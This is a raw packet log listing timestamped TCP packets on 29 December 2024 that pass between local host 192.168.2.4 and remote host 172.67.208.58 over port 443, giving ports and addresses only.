Dec 29, 2024 17:56:04.159508944 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.159562111 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.159568071 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.159603119 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.167803049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.167817116 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.167877913 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.167884111 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.167921066 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.176055908 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.176069975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.176135063 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.176141024 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.176175117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.183706045 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.183721066 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.183775902 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.183782101 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.183815956 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.189656973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.189699888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.189728975 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.189734936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.189749002 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.198003054 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.198018074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.198051929 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.198056936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.198086023 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.205245972 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.205260038 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.205317974 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.205328941 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.254317999 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.360794067 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.360821962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.360887051 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.360898972 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.360924006 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.360943079 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.369056940 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.369072914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.369146109 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.369154930 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.369196892 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.376280069 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.376296043 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.376352072 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.376359940 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.376400948 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.384484053 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.384497881 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.384552956 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.384560108 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.384592056 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.384609938 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.392302990 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.392318964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.392380953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.392386913 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.392426014 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.400459051 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.400473118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.400522947 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.400528908 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.400578022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.404593945 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.408766985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.408782005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.408813953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.408821106 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.408859015 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.415999889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.416014910 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.416066885 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.416073084 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.416110992 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.570980072 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.571002007 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.571046114 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.571053982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.571088076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.571105003 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.579061985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.579077005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.579144955 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.579150915 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.579185009 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.587385893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.587409973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.587439060 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.587446928 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.587497950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.594521999 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.594537020 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.594594002 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.594599962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.594638109 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.603302002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.603329897 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.603354931 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.603360891 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.603394032 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.603405952 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.610460997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.610476971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.610511065 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.610517979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.610548973 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.610565901 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.618729115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.618742943 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.618788004 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.618796110 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.618834019 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.626821041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.626837015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.626895905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.626904011 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.626941919 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.781903982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.781920910 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.782057047 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.782077074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.782130957 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.790057898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.790071964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.790139914 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.790144920 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.790179014 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.798269033 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.798283100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.798341990 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.798346996 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.798382044 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.805447102 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.805460930 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.805512905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.805520058 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.805558920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.813103914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.813117981 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.813163042 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.813169003 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.813198090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.813215017 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.821367979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.821382046 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.821446896 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.821455956 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.821492910 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.829516888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.829530001 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.829580069 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.829585075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.829627037 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.837735891 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.837749958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.837811947 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.837816954 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.837857962 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.992638111 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.992651939 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.992727041 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:04.992734909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:04.992774010 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.000801086 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.000814915 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.000878096 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.000885010 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.000922918 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.008142948 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.008157015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.008224964 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.008234024 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.008274078 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.016252995 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.016266108 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.016329050 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.016336918 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.016385078 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.023870945 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.023885012 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.023946047 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.023952961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.023989916 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.032125950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.032140017 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.032212019 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.032217979 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.032279015 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.040287971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.040319920 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.040359020 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.040364981 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.040397882 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.047468901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.047491074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.047560930 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.047574997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.047611952 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.203286886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.203303099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.203478098 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.203489065 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.203613043 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.211385012 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.211399078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.211462975 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.211467981 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.211500883 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.219635963 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.219649076 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.219706059 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.219711065 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.219773054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.226828098 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.226843119 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.226901054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.226911068 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.226952076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.235482931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.235496044 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.235548019 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.235553980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.235590935 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.240324974 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.240360975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.240390062 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.240396023 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.240421057 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.248436928 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.248450994 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.248506069 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.248517036 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.256653070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.256668091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.256727934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.256733894 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.297939062 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.414439917 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.414458990 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.414536953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.414549112 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.414591074 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.422620058 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.422633886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.422708035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.422719002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.422765970 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.430742025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.430757046 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.430860996 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.430871964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.430958033 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.437906027 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.437920094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.437983036 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.437989950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.438035011 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.446171045 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.446185112 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.446269035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.446280956 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.446333885 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.453804016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.453818083 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.453883886 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.453891039 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.453933001 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.462030888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.462048054 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.462114096 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.462121964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.462162018 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.470160961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.470175982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.470241070 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.470247030 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.470290899 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.625185013 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.625201941 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.625260115 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.625267982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.625307083 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.633255005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.633270025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.633398056 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.633404016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.633512020 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.641473055 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.641486883 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.641545057 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.641551971 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.641590118 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.648674965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.648688078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.648741961 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.648747921 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.648789883 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.654424906 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.654467106 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.654494047 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.654500008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.654526949 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.662143946 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.662157059 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.662216902 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.662225008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.670298100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.670310974 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.670394897 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.670403004 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.678534985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.678548098 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.678596973 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.678603888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.719779015 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.833456039 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.833473921 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.833523035 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.833534002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.833559990 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.833575964 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.841598988 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.841614008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.841665030 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.841671944 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.841715097 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.849755049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.849769115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.849806070 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.849814892 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.849833012 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.849849939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.856940985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.856956005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.857037067 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:05.857043028 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:05.857081890 CET	49758	443	192.168.2.4	172.67.208.58
